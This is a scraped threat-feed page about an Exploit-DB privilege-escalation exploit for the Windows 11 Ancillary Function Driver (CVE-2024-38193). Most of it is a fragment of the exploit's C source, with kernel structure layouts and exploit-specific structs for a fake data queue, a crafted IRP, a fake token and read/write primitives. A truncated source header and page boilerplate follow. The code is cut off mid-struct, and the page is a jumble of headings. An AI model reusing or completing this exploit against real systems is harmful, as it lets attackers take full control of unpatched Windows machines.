CreateMailslot; //0x8 struct { ULONG Length; //0x8 ULONG Key; //0x10 ULONG Flags; //0x14 union _LARGE_INTEGER ByteOffset; //0x18 } Read; //0x8 struct { ULONG Length; //0x8 ULONG Key; //0x10 ULONG Flags; //0x14 union _LARGE_INTEGER ByteOffset; //0x18 } Write; //0x8 struct { ULONG Length; //0x8 struct _UNICODE_STRING* FileName; //0x10 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x18 ULONG FileIndex; //0x20 } QueryDirectory; //0x8 struct { ULONG Length; //0x8 ULONG CompletionFilter; //0x10 } NotifyDirectory; //0x8 struct { ULONG Length; //0x8 ULONG CompletionFilter; //0x10 enum _DIRECTORY_NOTIFY_INFORMATION_CLASS DirectoryNotifyInformationClass; //0x18 } NotifyDirectoryEx; //0x8 struct { ULONG Length; //0x8 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10 } QueryFile; //0x8 struct { ULONG Length; //0x8 enum _FILE_INFORMATION_CLASS FileInformationClass; //0x10 struct _FILE_OBJECT* FileObject; //0x18 union { struct { UCHAR ReplaceIfExists; //0x20 UCHAR AdvanceOnly; //0x21 }; ULONG ClusterCount; //0x20 VOID* DeleteHandle; //0x20 }; } SetFile; //0x8 struct { ULONG Length; //0x8 VOID* EaList; //0x10 ULONG EaListLength; //0x18 ULONG EaIndex; //0x20 } QueryEa; //0x8 struct { ULONG Length; //0x8 } SetEa; //0x8 struct { ULONG Length; //0x8 enum _FSINFOCLASS FsInformationClass; //0x10 } QueryVolume; //0x8 struct { ULONG Length; //0x8 enum _FSINFOCLASS FsInformationClass; //0x10 } SetVolume; //0x8 struct { ULONG OutputBufferLength; //0x8 ULONG InputBufferLength; //0x10 ULONG FsControlCode; //0x18 VOID* Type3InputBuffer; //0x20 } FileSystemControl; //0x8 struct { union _LARGE_INTEGER* Length; //0x8 ULONG Key; //0x10 union _LARGE_INTEGER ByteOffset; //0x18 } LockControl; //0x8 struct { ULONG OutputBufferLength; //0x8 ULONG InputBufferLength; //0x10 ULONG IoControlCode; //0x18 VOID* Type3InputBuffer; //0x20 } DeviceIoControl; //0x8 struct { ULONG SecurityInformation; //0x8 ULONG Length; //0x10 } QuerySecurity; //0x8 struct { ULONG SecurityInformation; //0x8 VOID* SecurityDescriptor; //0x10 } SetSecurity; //0x8 struct { struct _VPB* Vpb; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x10 } MountVolume; //0x8 struct { struct _VPB* Vpb; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x10 } VerifyVolume; //0x8 struct { struct _SCSI_REQUEST_BLOCK* Srb; //0x8 } Scsi; //0x8 struct { ULONG Length; //0x8 VOID* StartSid; //0x10 struct _FILE_GET_QUOTA_INFORMATION* SidList; //0x18 ULONG SidListLength; //0x20 } QueryQuota; //0x8 struct { ULONG Length; //0x8 } SetQuota; //0x8 struct { enum _DEVICE_RELATION_TYPE Type; //0x8 } QueryDeviceRelations; //0x8 struct { struct _GUID* InterfaceType; //0x8 USHORT Size; //0x10 USHORT Version; //0x12 struct _INTERFACE* Interface; //0x18 VOID* InterfaceSpecificData; //0x20 } QueryInterface; //0x8 struct { struct _DEVICE_CAPABILITIES* Capabilities; //0x8 } DeviceCapabilities; //0x8 struct { struct _IO_RESOURCE_REQUIREMENTS_LIST* IoResourceRequirementList; //0x8 } FilterResourceRequirements; //0x8 struct { ULONG WhichSpace; //0x8 VOID* Buffer; //0x10 ULONG Offset; //0x18 ULONG Length; //0x20 } ReadWriteConfig; //0x8 struct { UCHAR Lock; //0x8 } SetLock; //0x8 struct { enum BUS_QUERY_ID_TYPE IdType; //0x8 } QueryId; //0x8 struct { enum DEVICE_TEXT_TYPE DeviceTextType; //0x8 ULONG LocaleId; //0x10 } QueryDeviceText; //0x8 struct { UCHAR InPath; //0x8 UCHAR Reserved[3]; //0x9 enum _DEVICE_USAGE_NOTIFICATION_TYPE Type; //0x10 } UsageNotification; //0x8 struct { enum _SYSTEM_POWER_STATE PowerState; //0x8 } WaitWake; //0x8 struct { struct _POWER_SEQUENCE* PowerSequence; //0x8 } PowerSequence; //0x8 struct { union { ULONG SystemContext; //0x8 struct _SYSTEM_POWER_STATE_CONTEXT SystemPowerStateContext; //0x8 }; enum _POWER_STATE_TYPE Type; //0x10 union _POWER_STATE State; //0x18 enum POWER_ACTION ShutdownType; //0x20 } Power; //0x8 struct { struct _CM_RESOURCE_LIST* AllocatedResources; //0x8 struct _CM_RESOURCE_LIST* AllocatedResourcesTranslated; //0x10 } StartDevice; //0x8 struct { ULONGLONG ProviderId; //0x8 VOID* DataPath; //0x10 ULONG BufferSize; //0x18 VOID* Buffer; //0x20 } WMI; //0x8 struct { VOID* Argument1; //0x8 VOID* Argument2; //0x10 VOID* Argument3; //0x18 VOID* Argument4; //0x20 } Others; //0x8 } Parameters; //0x8 struct _DEVICE_OBJECT* DeviceObject; //0x28 struct _FILE_OBJECT* FileObject; //0x30 LONG(*CompletionRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2, VOID* arg3); //0x38 VOID* Context; //0x40 }IO_STACK_LOCATION; //0x18 bytes (sizeof) struct _KDEVICE_QUEUE_ENTRY { struct _LIST_ENTRY DeviceListEntry; //0x0 ULONG SortKey; //0x10 UCHAR Inserted; //0x14 }; //0x58 bytes (sizeof) struct _KAPC { UCHAR Type; //0x0 UCHAR AllFlags; //0x1 UCHAR Size; //0x2 UCHAR SpareByte1; //0x3 ULONG SpareLong0; //0x4 struct _KTHREAD* Thread; //0x8 struct _LIST_ENTRY ApcListEntry; //0x10 VOID* Reserved[3]; //0x20 VOID* NormalContext; //0x38 VOID* SystemArgument1; //0x40 VOID* SystemArgument2; //0x48 CHAR ApcStateIndex; //0x50 CHAR ApcMode; //0x51 UCHAR Inserted; //0x52 }; //0xd0 bytes (sizeof) struct _IRP { SHORT Type; //0x0 USHORT Size; //0x2 USHORT AllocationProcessorNumber; //0x4 USHORT Reserved; //0x6 struct _MDL* MdlAddress; //0x8 ULONG Flags; //0x10 union { struct _IRP* MasterIrp; //0x18 LONG IrpCount; //0x18 VOID* SystemBuffer; //0x18 } AssociatedIrp; //0x18 struct _LIST_ENTRY ThreadListEntry; //0x20 struct IO_STATUS_BLOCK IoStatus; //0x30 CHAR RequestorMode; //0x40 UCHAR PendingReturned; //0x41 CHAR StackCount; //0x42 CHAR CurrentLocation; //0x43 UCHAR Cancel; //0x44 UCHAR CancelIrql; //0x45 CHAR ApcEnvironment; //0x46 UCHAR AllocationFlags; //0x47 union { struct _IO_STATUS_BLOCK* UserIosb; //0x48 VOID* IoRingContext; //0x48 }; struct _KEVENT* UserEvent; //0x50 union { struct { union { VOID(*UserApcRoutine)(VOID* arg1, struct _IO_STATUS_BLOCK* arg2, ULONG arg3); //0x58 VOID* IssuingProcess; //0x58 }; union { VOID* UserApcContext; //0x60 struct _IORING_OBJECT* IoRing; //0x60 }; } AsynchronousParameters; //0x58 union _LARGE_INTEGER AllocationSize; //0x58 } Overlay; //0x58 VOID(*CancelRoutine)(struct _DEVICE_OBJECT* arg1, struct _IRP* arg2); //0x68 VOID* UserBuffer; //0x70 union { struct { union { struct _KDEVICE_QUEUE_ENTRY DeviceQueueEntry; //0x78 VOID* DriverContext[4]; //0x78 }; struct _ETHREAD* Thread; //0x98 CHAR* AuxiliaryBuffer; //0xa0 struct _LIST_ENTRY ListEntry; //0xa8 union { struct _IO_STACK_LOCATION* CurrentStackLocation; //0xb8 ULONG PacketType; //0xb8 }; struct _FILE_OBJECT* OriginalFileObject; //0xc0 VOID* IrpExtension; //0xc8 } Overlay; //0x78 struct _KAPC Apc; //0x78 VOID* CompletionKey; //0x78 } Tail; //0x78 }; typedef struct _TA_ADDRESS { USHORT AddressLength; USHORT AddressType; UCHAR Address[1]; }TA_ADDRESS; typedef struct _TRANSPORT_ADDRESS { LONG TAAddressCount; TA_ADDRESS Address[1]; }TRANSPORT_ADDRESS; typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer; } UNICODE_STRING, * PUNICODE_STRING; typedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService; }OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES; typedef struct _SYSTEM_MODULE_ENTRY { HANDLE Section; PVOID MappedBase; PVOID ImageBase; ULONG ImageSize; ULONG Flags; USHORT LoadOrderIndex; USHORT InitOrderIndex; USHORT LoadCount; USHORT OffsetToFileName; UCHAR FullPathName[256]; } SYSTEM_MODULE_ENTRY, * PSYSTEM_MODULE_ENTRY; typedef struct _SYSTEM_MODULE_INFORMATION { ULONG Count; SYSTEM_MODULE_ENTRY Module[1]; } SYSTEM_MODULE_INFORMATION, * PSYSTEM_MODULE_INFORMATION; typedef struct _SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX { PVOID Object; ULONG_PTR UniqueProcessId; ULONG_PTR HandleValue; ULONG GrantedAccess; USHORT CreatorBackTraceIndex; USHORT ObjectTypeIndex; ULONG HandleAttributes; ULONG Reserved; } SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX, * PSYSTEM_HANDLE_TABLE_ENTRY_INFO_EX; typedef struct _SYSTEM_HANDLE_INFORMATION_EX { ULONG_PTR NumberOfHandles; ULONG_PTR Reserved; SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX Handles[1]; } SYSTEM_HANDLE_INFORMATION_EX, * PSYSTEM_HANDLE_INFORMATION_EX; typedef struct _AFD_CREATE_PACKET { //FILE_FULL_EA_INFORMATION ULONG NextEntryOffset; WORD Flags; UCHAR EaNameLength; USHORT EaValueLength; CHAR EaName[15]; //AFD_CREATE_PACKET ULONG EndpointFlags; ULONG GroupID; ULONG AddressFamily; ULONG SocketType; ULONG Protocol; ULONG SizeOfTransportName; wchar_t TransportName[16]; //UCHAR Unkown; } AFD_CREATE_PACKET; enum THREADINFOCLASS { ThreadImpersonationToken = 5 }; enum SYSTEM_INFORMATION_CLASS { SystemModuleInformation = 11, SystemExtendedHandleInformation = 64 }; typedef enum EVENT_TYPE { NotificationEvent, SynchronizationEvent }; typedef struct _AFD_BIND_DATA { ULONG ShareType; SOCKADDR_IN addr; } AFD_BIND_DATA, * PAFD_BIND_DATA; typedef struct alignas(16) MY_AFD_CONNECT_INFO { __int64 UseSan; __int64 hNtSock1; __int64 Unknown; __int32 tmp6; WORD const_16; sockaddr_in bind; }; typedef struct FAKE_DATA_ENTRY_QUEUE { DWORD tmp; LIST_ENTRY nextQueue; __int64 unknown; PVOID security_client_context; __int64 unknown2; __int64 sizeOfData; char DATA[0x77FD0]; }; typedef struct _AFD_LISTEN_INFO { ULONG unknown; __int64 MaximumConnectionQueue; } AFD_LISTEN_INFO, * PAFD_LISTEN_INFO; typedef struct _SECURITY_CLIENT_CONTEXT { _SECURITY_QUALITY_OF_SERVICE SecurityQos; void* ClientToken; unsigned __int8 DirectlyAccessClientToken; unsigned __int8 DirectAccessEffectiveOnly; unsigned __int8 ServerIsRemote; _TOKEN_CONTROL ClientTokenControl; }SECURITY_CLIENT_CONTEXT, * PSECURITY_CLIENT_CONTEXT; struct __declspec(align(8)) _OWNER_ENTRY { unsigned __int64 OwnerThread; DWORD ___u1; }; //0x68 bytes (sizeof) typedef struct _ERESOURCE { struct _LIST_ENTRY SystemResourcesList; //0x0 struct _OWNER_ENTRY* OwnerTable; //0x10 SHORT ActiveCount; //0x18 union { USHORT Flag; //0x1a struct { UCHAR ReservedLowFlags; //0x1a UCHAR WaiterPriority; //0x1b }; }; VOID* SharedWaiters; //0x20 VOID* ExclusiveWaiters; //0x28 struct _OWNER_ENTRY OwnerEntry; //0x30 ULONG ActiveEntries; //0x40 ULONG ContentionCount; //0x44 ULONG NumberOfSharedWaiters; //0x48 ULONG NumberOfExclusiveWaiters; //0x4c VOID* Reserved2; //0x50 union { VOID* Address; //0x58 ULONGLONG CreatorBackTraceIndex; //0x58 }; ULONGLONG SpinLock; //0x60 }ERESOURCE, *PERESOURCE; //0x8 bytes (sizeof) typedef struct _EX_PUSH_LOCK { union { struct { ULONGLONG Locked : 1; //0x0 ULONGLONG Waiting : 1; //0x0 ULONGLONG Waking : 1; //0x0 ULONGLONG MultipleShared : 1; //0x0 ULONGLONG Shared : 60; //0x0 }; ULONGLONG Value; //0x0 VOID* Ptr; //0x0 }; }; //0x10 bytes (sizeof) typedef struct _SEP_CACHED_HANDLES_TABLE { struct _EX_PUSH_LOCK Lock; //0x0 struct _RTL_DYNAMIC_HASH_TABLE* HashTable; //0x8 }; //0x8 bytes (sizeof) typedef struct _EX_RUNDOWN_REF { union { ULONGLONG Count; //0x0 VOID* Ptr; //0x0 }; }; //0x20 bytes (sizeof) typedef struct _OB_HANDLE_REVOCATION_BLOCK { struct _LIST_ENTRY RevocationInfos; //0x0 struct _EX_PUSH_LOCK Lock; //0x10 struct _EX_RUNDOWN_REF Rundown; //0x18 }; //0xc0 bytes (sizeof) typedef struct _SEP_LOGON_SESSION_REFERENCES { struct _SEP_LOGON_SESSION_REFERENCES* Next; //0x0 struct _LUID LogonId; //0x8 struct _LUID BuddyLogonId; //0x10 LONGLONG ReferenceCount; //0x18 ULONG Flags; //0x20 struct _DEVICE_MAP* pDeviceMap; //0x28 VOID* Token; //0x30 struct _UNICODE_STRING AccountName; //0x38 struct _UNICODE_STRING AuthorityName; //0x48 struct _SEP_CACHED_HANDLES_TABLE CachedHandlesTable; //0x58 struct _EX_PUSH_LOCK SharedDataLock; //0x68 struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* SharedClaimAttributes; //0x70 struct _SEP_SID_VALUES_BLOCK* SharedSidValues; //0x78 struct _OB_HANDLE_REVOCATION_BLOCK RevocationBlock; //0x80 struct _EJOB* ServerSilo; //0xa0 struct _LUID SiblingAuthId; //0xa8 struct _LIST_ENTRY TokenList; //0xb0 }; //0x30 bytes (sizeof) typedef struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION { ULONG SecurityAttributeCount; //0x0 struct _LIST_ENTRY SecurityAttributesList; //0x8 ULONG WorkingSecurityAttributeCount; //0x18 struct _LIST_ENTRY WorkingSecurityAttributesList; //0x20 }AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION; //0x20 bytes (sizeof) typedef struct _SEP_SID_VALUES_BLOCK { ULONG BlockLength; //0x0 LONGLONG ReferenceCount; //0x8 ULONG SidCount; //0x10 ULONGLONG SidValuesStart; //0x18 }SEP_SID_VALUES_BLOCK,*PSEP_SID_VALUES_BLOCK; //0x18 bytes (sizeof) struct _SEP_TOKEN_PRIVILEGES { ULONGLONG Present; //0x0 ULONGLONG Enabled; //0x8 ULONGLONG EnabledByDefault; //0x10 }; //0x1f bytes (sizeof) struct _SEP_AUDIT_POLICY { struct _TOKEN_AUDIT_POLICY AdtTokenPolicy; //0x0 UCHAR PolicySetStatus; //0x1e }; //0x498 bytes (sizeof) struct _TOKEN { struct _TOKEN_SOURCE TokenSource; //0x0 struct _LUID TokenId; //0x10 struct _LUID AuthenticationId; //0x18 struct _LUID ParentTokenId; //0x20 union _LARGE_INTEGER ExpirationTime; //0x28 struct _ERESOURCE* TokenLock; //0x30 struct _LUID ModifiedId; //0x38 struct _SEP_TOKEN_PRIVILEGES Privileges; //0x40 struct _SEP_AUDIT_POLICY AuditPolicy; //0x58 ULONG SessionId; //0x78 ULONG UserAndGroupCount; //0x7c ULONG RestrictedSidCount; //0x80 ULONG VariableLength; //0x84 ULONG DynamicCharged; //0x88 ULONG DynamicAvailable; //0x8c ULONG DefaultOwnerIndex; //0x90 struct _SID_AND_ATTRIBUTES* UserAndGroups; //0x98 struct _SID_AND_ATTRIBUTES* RestrictedSids; //0xa0 VOID* PrimaryGroup; //0xa8 ULONG* DynamicPart; //0xb0 struct _ACL* DefaultDacl; //0xb8 enum _TOKEN_TYPE TokenType; //0xc0 enum _SECURITY_IMPERSONATION_LEVEL ImpersonationLevel; //0xc4 ULONG TokenFlags; //0xc8 UCHAR TokenInUse; //0xcc ULONG IntegrityLevelIndex; //0xd0 ULONG MandatoryPolicy; //0xd4 void* LogonSession; //0xd8 struct _LUID OriginatingLogonSession; //0xe0 struct _SID_AND_ATTRIBUTES_HASH SidHash; //0xe8 struct _SID_AND_ATTRIBUTES_HASH RestrictedSidHash; //0x1f8 struct _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; //0x308 VOID* Package; //0x310 struct _SID_AND_ATTRIBUTES* Capabilities; //0x318 ULONG CapabilityCount; //0x320 struct _SID_AND_ATTRIBUTES_HASH CapabilitiesHash; //0x328 struct _SEP_LOWBOX_NUMBER_ENTRY* LowboxNumberEntry; //0x438 struct _SEP_CACHED_HANDLES_ENTRY* LowboxHandlesEntry; //0x440 struct _AUTHZBASEP_CLAIM_ATTRIBUTES_COLLECTION* pClaimAttributes; //0x448 VOID* TrustLevelSid; //0x450 struct _TOKEN* TrustLinkedToken; //0x458 VOID* IntegrityLevelSidValue; //0x460 struct _SEP_SID_VALUES_BLOCK* TokenSidValues; //0x468 struct _SEP_LUID_TO_INDEX_MAP_ENTRY* IndexEntry; //0x470 struct _SEP_TOKEN_DIAG_TRACK_ENTRY* DiagnosticInfo; //0x478 struct _SEP_CACHED_HANDLES_ENTRY* BnoIsolationHandlesEntry; //0x480 VOID* SessionObject; //0x488 ULONGLONG VariablePart; //0x490 }; //0x38 bytes (sizeof) struct _OBJECT_HEADER { LONGLONG PointerCount; //0x0 union { LONGLONG HandleCount; //0x8 VOID* NextToFree; //0x8 }; struct _EX_PUSH_LOCK Lock; //0x10 UCHAR TypeIndex; //0x18 union { UCHAR TraceFlags; //0x19 struct { UCHAR DbgRefTrace : 1; //0x19 UCHAR DbgTracePermanent : 1; //0x19 }; }; UCHAR InfoMask; //0x1a union { UCHAR Flags; //0x1b struct { UCHAR NewObject : 1; //0x1b UCHAR KernelObject : 1; //0x1b UCHAR KernelOnlyAccess : 1; //0x1b UCHAR ExclusiveObject : 1; //0x1b UCHAR PermanentObject : 1; //0x1b UCHAR DefaultSecurityQuota : 1; //0x1b UCHAR SingleHandleEntry : 1; //0x1b UCHAR DeletedInline : 1; //0x1b }; }; ULONG Reserved; //0x1c union { struct _OBJECT_CREATE_INFORMATION* ObjectCreateInfo; //0x20 VOID* QuotaBlockCharged; //0x20 }; VOID* SecurityDescriptor; //0x28 struct _TOKEN Body; //0x30 }; struct mm { void* fake_data_entry; void* input; _IRP* crafted_irp; IO_STACK_LOCATION *crafted_arbitrary_io_stack_location; void* p_mem_0x30; void* p_mem_0xD0_2; _AUTHZBASEP_SECURITY_ATTRIBUTES_INFORMATION* pSecurityAttributes; ACL* VariablePartDefaultDacl; ACL* VariablePartDefaultDacl2; _ERESOURCE* TokenLock; void* PrimaryGroup; int sizeOfClientTokenAndObjectHeader; PSEP_SID_VALUES_BLOCK TokenSidValues; _SECURITY_CLIENT_CONTEXT* security_client_context; _SEP_LOGON_SESSION_REFERENCES* LogonSession; _TOKEN* fakeToken; void *pipe_100_im_control_block; void* pipe_100_rw_control_block; void* p_mem_Pipe_hToPipe_1000_rw; void* p_mem_Pipe_hToPipe_1000_rw_2; HANDLE hPipeIM; HANDLE hPipeRW; HANDLE hFileIM; HANDLE hFileRW; HANDLE IncPrimitiveTOKEN; HANDLE RWPrimitiveTOKEN; }; //0x18 bytes (sizeof) struct _DISPATCHER_HEADER { union { volatile LONG Lock; //0x0 LONG LockNV; //0x0 struct { UCHAR Type; //0x0 UCHAR Signalling; //0x1 UCHAR Size; //0x2 UCHAR Reserved1; //0x3 }; struct { UCHAR TimerType; //0x0 union { UCHAR TimerControlFlags; //0x1 struct { UCHAR Absolute : 1;

Source: Exploit-DB RSS Feed

Published: Fri May 09 2025

Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

High

Exploitwindows local exploit windows

Published: Fri May 09 2025 (05/09/2025, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

AI-Powered Analysis

AILast updated: 06/11/2025, 21:08:53 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Need more detailed analysis?Get Pro

Pro Feature

For access to advanced analysis and higher rate limits, contact root@offseq.com

Technical Details

Edb Id: 52284
Has Exploit Code: true
Code Language: c

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

# Exploit Title: Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation
# Date: 2025-05-05
# Exploit Author: Milad Karimi (Ex3ptionaL)
# Contact: miladgrayhat@gmail.com
# Zone-H: www.zone-h.org/archive/notifier=Ex3ptionaL
# Tested on: Win x64
# CVE : CVE-2024-38193

#pragma once

#include "ntstatus.h"
#include "Windows.h"
#include <iostream>

#pragma comment(lib, "ntdll.lib")


#define HIDWORD(l) ((DWORD)(((DWORDLONG)(l)>>32)&0xFFFFFFFF))
#define LODWORD(l) ((... (23684 more characters)

Code Length: 24,184 characters • Language: C/C++

Threat ID: 68489e0f7e6d765d51d53d85

Added to database: 6/10/2025, 9:05:19 PM

Last enriched: 6/11/2025, 9:08:53 PM

Last updated: 8/17/2025, 10:23:55 PM

Related Threats

Malicious PyPI and npm Packages Discovered Exploiting Dependencies in Supply Chain Attacks

High

Security-newsMon Aug 18 2025

U.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs

Medium

Security-newsThu Aug 14 2025

Actions

PRO

Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.

Please log in to the Console to use AI analysis features.

External Links

Original Source Raw Exploit Code Search on Google

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

AI Analysis

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Indicators of Compromise

Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

Description

AI-Powered Analysis

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Technical Details

Indicators of Compromise

Exploit Source Code

Exploit code for Microsoft Windows 11 Pro 23H2 - Ancillary Function Driver for WinSock Privilege Escalation

Related Threats

Malicious PyPI and npm Packages Discovered Exploiting Dependencies in Supply Chain Attacks

Researcher to release exploit for full auth bypass on FortiWeb

Top Israeli Cybersecurity Director Arrested in US Child Exploitation Sting

EncryptHub abuses Brave Support in new campaign exploiting MSC EvilTwin flaw

U.S. CISA adds N-able N-Central flaws to its Known Exploited Vulnerabilities catalog - Security Affairs

Actions

External Links

Need enhanced features?

Latest Threats

Keyboard Shortcuts

Navigation

Search & Filters

UI Controls

Accessibility